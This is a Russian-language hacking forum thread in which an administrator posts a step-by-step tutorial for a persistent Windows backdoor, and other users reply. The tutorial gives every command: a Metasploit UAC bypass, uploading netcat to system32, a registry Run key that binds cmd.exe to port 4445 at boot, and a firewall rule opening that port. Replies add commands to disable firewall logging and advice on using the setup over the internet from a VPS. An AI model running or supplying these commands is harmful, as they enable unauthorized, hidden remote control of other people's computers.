Permanent Backdoor

Vander

Well-Known Member
Администратор
16.01.2016
961
2 212
28
#1
Привет! В данной публикации, я покажу, как осуществить постоянный доступ к уязвимому, к примеру, посредством reverse shell (meterpreter) компьютеру.

upload_2016-10-31_21-14-49.png

В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109. Итак, нам понадобится открытая сессия meterpreter:

upload_2016-10-31_21-15-24.png

Для продолжения, необходимо обойти UAC на целевом хосте:

> use exploit/windows/local/bypassuac_injection

И по порядку выполняем команды, как показано на скриншоте ниже:

upload_2016-10-31_21-15-50.png

В случае успеха вывод команды getsystem будет таким:

upload_2016-10-31_21-16-18.png

Теперь, необходимо загрузить на целевую систему программу netcat - это утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их. Делается это следующим образом, вводим в консоли meterpreter:

> upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

upload_2016-10-31_21-16-51.png


Затем редактируем реестр цели, для запуска netcat при загрузке:

> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat –d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’


upload_2016-10-31_21-17-43.png

Открываем shell, для того чтобы внести свои поправки в firewall целевого хоста.

> shell

upload_2016-10-31_21-18-18.png

Вносим правило в firewall:

> netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445

netsh —
программа, включенная в линейку продуктов операционных систем Microsoft Windows NT начиная с Windows 2000. Она позволяет осуществлять локальное или удаленное конфигурирование сетевых параметров.

upload_2016-10-31_21-20-47.png

Убедимся, что наши усилия не прошли даром, и правило было успешно добавлено:

> netsh firewall show portopening

upload_2016-10-31_21-21-27.png

Все ок. Перезагрузим целевой хост, а перед этим откроем второй терминал в Kali и введем команду:

> nc -nv 192.168.0.109 4445 (Где 192.168.0.109 – адрес целевой машины)

После перезагрузки получаем shell на целевой системе:

upload_2016-10-31_21-22-43.png
 

dandu

Member
19.10.2016
12
2
34
#3
После ввода команды "exploit" выводит ошибку:
Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
Exploit complated, but no session was created.
 

MAdDog719

Well-Known Member
Премиум
16.08.2016
108
26
30
#5
Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
 

Vander

Well-Known Member
Администратор
16.01.2016
961
2 212
28
#6
Уточните, пожалуйста, на каком windows это протестировано? на Win 10 работать будет?
В начале писал - В роли атакующей системы Kali Linux 2016.2 с адресом в локальной сети 192.168.0.101 и целевой хост – Windows 8.1. с адресом в локальной сети 192.168.0.109.
 

Vander

Well-Known Member
Администратор
16.01.2016
961
2 212
28
#8
Очевидно же, что эксплойт ругается на номер сессии. У вас точно есть активная сессия meterpreter под номером 1?
 

objque

New Member
05.11.2016
1
0
23
#10
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
 

Vander

Well-Known Member
Администратор
16.01.2016
961
2 212
28
#11
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ - Посмотрите тут, эта схема работает
 

kot-gor

Well-Known Member
ELEET
07.09.2016
385
409
39
#12
Возможно ли настроиться для работы не из одной локальной сети?
В наличии vps'ка, на которой крутится kali2 и, для примера, домашняя пека с win7 на борту.

Все примеры по reverse_tcp только в локальной сети :(

Надеюсь на вашу помощь, спасибо!
Добрый день,, все тоже самое..только место локального своего ip указываете ip на vps.Бывают конечно небольшие отличия , но это зависит от каждого конкретного случая,некоторые виды пентеста можно сделать только в сегменте локальной сети.Иногда у меня сессия не работает с reverse_tcp я тогда заменяю на reverse_https.Старайтесь не действовать по шаблону.,шаблон хорош когда вы осваиваете. Я вообще пентест сравниваю с шахматами,но это сугубо мое личное мнение.
 

Ishikawa

マエストロ
Премиум
15.11.2016
126
189
37
#14
На каком-то сайте я уже видел эту статью, только английскую версию.
 

Vander

Well-Known Member
Администратор
16.01.2016
961
2 212
28
#15
На каком-то сайте я уже видел эту статью, только английскую версию.
exploit/windows/local/bypassuac_injection - Очень древний, статей по нему масса, и видео тоже. Я на своей машине проверил и описал.
 

Ishikawa

マエストロ
Премиум
15.11.2016
126
189
37
#16
На всякий случай: если нужно добавить правила в огнестенку на Winxp, то advfirewall не работает.
Нуно что-то вроде:
netsh firewall add portopening protocol=TCP port=4445 name=netcat
netsh firewall add allowedprogram C:\WINDOWS\System32\nc.exe

И не мешало бы:
netsh firewall set logging %systemroot%\system32\LogFiles\Firewall\pfirewall.log 4096 DISABLE DISABLE
 
Симпатии: Понравилось Vander

Ishikawa

マエストロ
Премиум
15.11.2016
126
189
37
#17
p.s. и есть одно важное уточнение. Допустим получили meterpreter-сессию.
Пробуем добавить правила в фаерволл, и если нам сообщается, что он выключен, то его нужно включить (пример для WinXP):
sc config SharedAccess start= auto
а потом запустим net start SharedAccess. Через минуту потеряем сессию.
При повторной попытке провести эксплойт, msf вам радостно сообщит, что эксплойт прошел, но сессию создать никак не выйден.
Nmap -v <host> -p <port> вам покажет печальную картину, что все порты фильтруются.
Т.о. сами отрубим себе руки :)
 

thunder

Well-Known Member
08.12.2016
237
8
#18
Vander: Вы уж ..простите за глупый вопрос.. Данным способом можно получить права администратора (getsystem) на windows 7 ?
 

thunder

Well-Known Member
08.12.2016
237
8
#20
Vander: Уж не знаю ..правильно ли я делал :) . Сам вирус делал по этому (видео)
, дальше дела по вашему гайду .. Сюда по всему что то получилось
... Еще раз вопрос .. сие действие возможно сделать в глобальной сети (я имею ввиду не только на виртуальной машине ) ? Как то непонятно(улыбнуло) мне в команде слово "local"